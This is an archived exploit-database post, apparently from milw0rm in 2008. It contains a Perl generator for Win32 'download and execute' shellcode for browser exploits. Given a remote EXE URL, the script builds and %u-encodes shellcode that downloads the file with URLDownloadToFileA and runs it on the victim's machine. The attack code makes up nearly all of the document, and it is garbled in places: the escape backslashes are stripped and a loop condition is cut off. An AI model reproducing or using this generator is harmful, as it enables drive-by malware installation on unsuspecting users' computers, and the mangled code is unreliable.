Win32 Download and Execute Shellcode Generator (browsers edition) 270 bytes:
2008-03-14 win32 Download and Execute Shellcode Generator (browsers edition) 48697 R D YAG KOHHA
#!/usr/bin/perl
$loading_url=$ARGV[0];
chomp ($loading_url);
my @buffer;
if ($loading_url eq "") {
$sco = 'ERROR!!! Enter url to remote exe.';
buffer_gen($sco);
print @buffer;
exit;
}
$c= generate_char(0);
$sco= "xE8x56x00x00x00x53x55x56x57x8Bx6Cx24x18x8Bx45".
"x3Cx8Bx54x05x78x01xEAx8Bx4Ax18x8Bx5Ax20x01xEB".
"xE3x32x49x8Bx34x8Bx01xEEx31xFFxFCx31xC0xACx38".
"xE0x74x07xC1xCFx0Dx01xC7xEBxF2x3Bx7Cx24x14x75".
"xE1x8Bx5Ax24x01xEBx66x8Bx0Cx4Bx8Bx5Ax1Cx01xEB".
"x8Bx04x8Bx01xE8xEBx02x31xC0x5Fx5Ex5Dx5BxC2x08".
"x00x5Ex6Ax30x59x64x8Bx19x8Bx5Bx0Cx8Bx5Bx1Cx8B".
"x1Bx8Bx5Bx08x53x68x8Ex4Ex0ExECxFFxD6x89xC7x53".
"x68x8Ex4Ex0ExECxFFxD6xEBx50x5Ax52xFFxD0x89xC2".
"x52x52x53x68xAAxFCx0Dx7CxFFxD6x5AxEBx4Dx59x51".
"x52xFFxD0xEBx72x5AxEBx5Bx59x6Ax00x6Ax00x51x52".
"x6Ax00xFFxD0x53x68xA0xD5xC9x4DxFFxD6x5Ax52xFF".
"xD0x53x68x98xFEx8Ax0ExFFxD6xEBx44x59x6Ax00x51".
"xFFxD0x53x68x7ExD8xE2x73xFFxD6x6Ax00xFFxD0xE8".
"xABxFFxFFxFFx75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00".
"xE8xAExFFxFFxFFx55x52x4Cx44x6Fx77x6Ex6Cx6Fx61".
"x64x54x6Fx46x69x6Cx65x41x00xE8xA0xFFxFFxFFx2E".
"x2Ex5C".$c."x00xE8xB7xFFxFFxFFx2Ex2Ex5C".$c."x00".
"xE8x89xFFxFFxFF".$loading_url."x00";
$sco=convert_sco($sco);
buffer_gen($sco);
print @buffer;
sub generate_char()
{
my $wdsize = shift;
my @alphanumeric = ('a'..'z');
my $wd = join '',
map $alphanumeric[rand @alphanumeric], 0..$wdsize;
return $wd;
}
sub convert_sco {
my $data = shift;
my $mode = shift() || 'LE';
my $code = '';
my $idx = 0;
if (length($data) % 2 != 0) {
$data .= substr($data, -1, 1);
}
while ($idx
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1));
if ($mode eq 'LE') {
$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
} else {
$code .= sprintf('%%u%.2x%.2x', $c1, $c2);
}
$idx += 2;
}
return $code;
}
sub buffer_gen(){
$sco = shift;
@buffer=
Win32 Download and Execute Shellcode Generator (browsers edition)
Size: 275 bytes + loading_url
Author: Yag Kohha (skyhole [at] gmail.com)
Usage: ./sco http://remote_server/loader.exe
Greetz to:
str0ke & milw0rm project
shinnai
h07
rgod
H.D. Moor & Metaspl0it
offtopic
3APA3A
-------> Start
$sco
-------> End
FX
}
# milw0rm.com [2008-03-14]
|
评论